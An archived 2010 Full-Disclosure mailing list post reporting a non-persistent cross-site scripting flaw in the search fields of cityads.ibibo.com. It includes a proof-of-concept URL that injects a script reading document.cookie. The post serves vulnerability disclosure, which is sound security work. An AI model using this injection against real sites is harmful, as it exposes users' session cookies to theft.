|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: rockey killer (skg102
gmail.com)
Date: Tue Feb 02 2010 - 14:10:22 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Cross Site Scripting (XSS)
Vulnerability in ibibo
In search fields of cityads.ibibo.com
ibibo.com is India’s first entertainment and talent based social network.
It gives the youth of India a unique platform to showcase their talent,
express themselves,
create their own social network, audience and fan club and hence get
recognition.
Vulnerability
Non-Persistent Cross site scripting (XSS) vulnerability is found in
cityads.ibibo.com
Disclosure Timeline
Reported: Tue, Jan 19, 2010 at 5:23 PM
Fixed: --------------
Credits
H4CK3R Crew
http://h4ck3r.in
POC URL
http://cityads.ibibo.com/search_result.php?cate_id=&q=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&searchFrom=search_bar
--
Rockey Killer
It's all about Hacking and Security
http://h4ck3r.in/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]